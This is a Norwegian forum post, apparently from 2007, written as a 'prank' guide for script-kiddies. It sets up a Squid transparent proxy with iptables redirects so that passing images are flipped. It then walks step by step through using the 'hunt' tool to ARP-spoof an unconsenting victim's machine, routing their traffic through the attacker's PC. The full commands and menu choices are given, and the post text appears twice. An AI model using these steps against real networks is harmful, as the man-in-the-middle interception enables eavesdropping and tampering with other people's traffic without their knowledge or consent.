Gutteromsmoro
Deler av dette skal ikke gjøre uten offerets samtykke. Alt gjøres på eget ansvar.
Sikkert mange av dere som har prøvd eller sett dette før, men fyrer alikevell ivei.
Hvis du sitter på rommet og kjeder deg litt, hva er vel ikke bedre enn noen smarte tips og triks? Her kommer gutteromsmoro: 1
Spesielt dedikert til script-kidies
Moro med Squid.
Det vi skal gjøre er å sette opp en pc til å fungere som gateway.
Vi skal sette opp squid som en transparent proxy server.
Morsomme delen med dette er at alle som bruker vår pc som gateway vill får alle *.jpg og *.gif bilder snudd opp ned. Eller andre kule bilde manipuleringer. Som f.eks negative bilder, skrift på bilder, striper på bilder osv. Nesten uendelig hva du kan gjøre med bildene som går gjennom servern.
For å få til dette må selvsagt brukeren manuelt sette din pc som gateway, men jeg skal også vise et triks som gjør at du uten av brukeren tillater det/vet om det setter din pc som gateway slik at han får seg et støkk nesten gang han slår opp en side med *.jpg eller *.gif bilder.
Du trenger selvsagt ikke samme oppsett som meg, men dette er det jeg brukte.
Og, ja jeg er klar over at jeg bruker chmod 755 her
Utstyr:
Pc med Ubuntu Feisty Fawn.
Tilgang til internett.
Interface eth1 (Hvis du bruker et annet interface må du selvsagt benytte det, hust å bytt i kodene jeg oppgir)
Vi begynner med å installere programmene vi trenger
Squid
Jeg legger ved squid.conf Pass på at du har squid 2.6
Bare erstatt denne med /etc/squid/squid.conf
Etter config bytte restart squid:
Apache2
Vi må også konfigurere vår maskin slik at den fungerer som en gateway
Redirect
Jeg har modifisert et script som heter redirect
Last det ned og putt det i /var/ katalogen.
Det er dette scriptet som manipulerer bildene.
La scriptet på kjøre tilgang.
I terminal kjør
Dette vil liste opp de mulighetene du har for bildemanipulasjon.
Du bare editerer redirect scriptet /var/redirect erstatter "-flip" med en ny funksjon.
Din pc er nå satt opp som gateway. Vil du teste oppsettet setter du denne pc`en som gateway og prøver å surfe litt med den. Alle *.jpg og *.gif bilder skulle da bli snudd opp ned.
Som sagt så er det muligheter for å gjøre en såkalt "arp spoof (Søk på¨forumet, finner nok mye om det der) Programmet vi bruker heter hunt. Kort fortalt lurer denne offeret vårt til å tro at vår pc er gatewayen istedenfor den virkelige gatewayen.
Så istedenfor at trafikken til offeret går slik:
Offerpc->Gaweway->Internett
Går den slik
Offerpc->Vårpc>Gateway>Internett
Hunt startes med kommandoen
Første meny kommer opp
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
->
Trykk alternativ "d" så enter
--- daemons --- rcvpkt 8, free/alloc 63/64 ------
r) reset daemon
a) arp spoof + arp relayer daemon
s) sniff daemon
m) mac discovery daemon
x) return
-dm>
Trykk alternativ "a" så enter
--- arpspoof daemon --- rcvpkt 105, free/alloc 63/64 ------
s/k) start/stop relayer daemon
l/L) list arp spoof database
a) add host to host arp spoof i/I) insert single/range arp spoof
d) delete host to host arp spoof r/R) remove single/range arp spoof
t/T) test if arp spoof successed y) relay database
x) return
-arps>
Trykk alternativ "i" så enter
Sett ip adressen til den virkelige gatewayen
Sett in mac adressen på ditt eth1 interface
Sett inn ip adressen til ditt offer sin pc
Refresh interval settes til 1
Arp angrepet er da utført og offeret skal blitt infisert.
Hvis alt har gått i boks skal offeret få opp-ned bilder i sin nettleser. Hvis bildene ikke er cachet. Så sørg for at han/hun går inn på en nettside der de ikke har vært de siste minuttene
Det var alt. Tror jeg ikke har glemt noe. Sleng en komentar hvis du finner noe.
Tok det rett fra hue. Editerer i morgen i morgen
Ikke slakt det da. Selv om det var min første skikkelig post
Vedlegg
Redirect
squid.conf
Deler av dette skal ikke gjøre uten offerets samtykke. Alt gjøres på eget ansvar.
Sikkert mange av dere som har prøvd eller sett dette før, men fyrer alikevell ivei.
Hvis du sitter på rommet og kjeder deg litt, hva er vel ikke bedre enn noen smarte tips og triks? Her kommer gutteromsmoro: 1
Spesielt dedikert til script-kidies
Moro med Squid.
Det vi skal gjøre er å sette opp en pc til å fungere som gateway.
Vi skal sette opp squid som en transparent proxy server.
Morsomme delen med dette er at alle som bruker vår pc som gateway vill får alle *.jpg og *.gif bilder snudd opp ned. Eller andre kule bilde manipuleringer. Som f.eks negative bilder, skrift på bilder, striper på bilder osv. Nesten uendelig hva du kan gjøre med bildene som går gjennom servern.
For å få til dette må selvsagt brukeren manuelt sette din pc som gateway, men jeg skal også vise et triks som gjør at du uten av brukeren tillater det/vet om det setter din pc som gateway slik at han får seg et støkk nesten gang han slår opp en side med *.jpg eller *.gif bilder.
Du trenger selvsagt ikke samme oppsett som meg, men dette er det jeg brukte.
Og, ja jeg er klar over at jeg bruker chmod 755 her
Utstyr:
Pc med Ubuntu Feisty Fawn.
Tilgang til internett.
Interface eth1 (Hvis du bruker et annet interface må du selvsagt benytte det, hust å bytt i kodene jeg oppgir)
Vi begynner med å installere programmene vi trenger
Kode
Sudo apt-get install squid
Kode
Sudo apt-get install apache2
Kode
Sudo apt-get install hunt
Kode
Sudo apt-get install imagemagick
Jeg legger ved squid.conf Pass på at du har squid 2.6
Bare erstatt denne med /etc/squid/squid.conf
Etter config bytte restart squid:
Kode
Sudo /etc/init.d/squid restart
Kode
Sudo mkdir /var/www/images
Kode
Sudo chmod 755 /var/www/images
Kode
Sudo iptables -t nat -I PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128
Kode
Sudo iptables -t nat -I POSTROUTING -o eth1 -j MASQUERADE
Kode
Sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Jeg har modifisert et script som heter redirect
Last det ned og putt det i /var/ katalogen.
Det er dette scriptet som manipulerer bildene.
La scriptet på kjøre tilgang.
Kode
Sudo chmod 755 /var/redirect
Kode
mogrify
Du bare editerer redirect scriptet /var/redirect erstatter "-flip" med en ny funksjon.
Din pc er nå satt opp som gateway. Vil du teste oppsettet setter du denne pc`en som gateway og prøver å surfe litt med den. Alle *.jpg og *.gif bilder skulle da bli snudd opp ned.
Som sagt så er det muligheter for å gjøre en såkalt "arp spoof (Søk på¨forumet, finner nok mye om det der) Programmet vi bruker heter hunt. Kort fortalt lurer denne offeret vårt til å tro at vår pc er gatewayen istedenfor den virkelige gatewayen.
Så istedenfor at trafikken til offeret går slik:
Offerpc->Gaweway->Internett
Går den slik
Offerpc->Vårpc>Gateway>Internett
Hunt startes med kommandoen
Kode
Sudo hunt -i eth1
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
->
Trykk alternativ "d" så enter
--- daemons --- rcvpkt 8, free/alloc 63/64 ------
r) reset daemon
a) arp spoof + arp relayer daemon
s) sniff daemon
m) mac discovery daemon
x) return
-dm>
Trykk alternativ "a" så enter
--- arpspoof daemon --- rcvpkt 105, free/alloc 63/64 ------
s/k) start/stop relayer daemon
l/L) list arp spoof database
a) add host to host arp spoof i/I) insert single/range arp spoof
d) delete host to host arp spoof r/R) remove single/range arp spoof
t/T) test if arp spoof successed y) relay database
x) return
-arps>
Trykk alternativ "i" så enter
Sett ip adressen til den virkelige gatewayen
Sett in mac adressen på ditt eth1 interface
Sett inn ip adressen til ditt offer sin pc
Refresh interval settes til 1
Arp angrepet er da utført og offeret skal blitt infisert.
Hvis alt har gått i boks skal offeret få opp-ned bilder i sin nettleser. Hvis bildene ikke er cachet. Så sørg for at han/hun går inn på en nettside der de ikke har vært de siste minuttene
Det var alt. Tror jeg ikke har glemt noe. Sleng en komentar hvis du finner noe.
Tok det rett fra hue. Editerer i morgen i morgen
Ikke slakt det da. Selv om det var min første skikkelig post
Vedlegg
Redirect
squid.conf
Sist endret av Fiskn; 25. april 2007 kl. 00:06.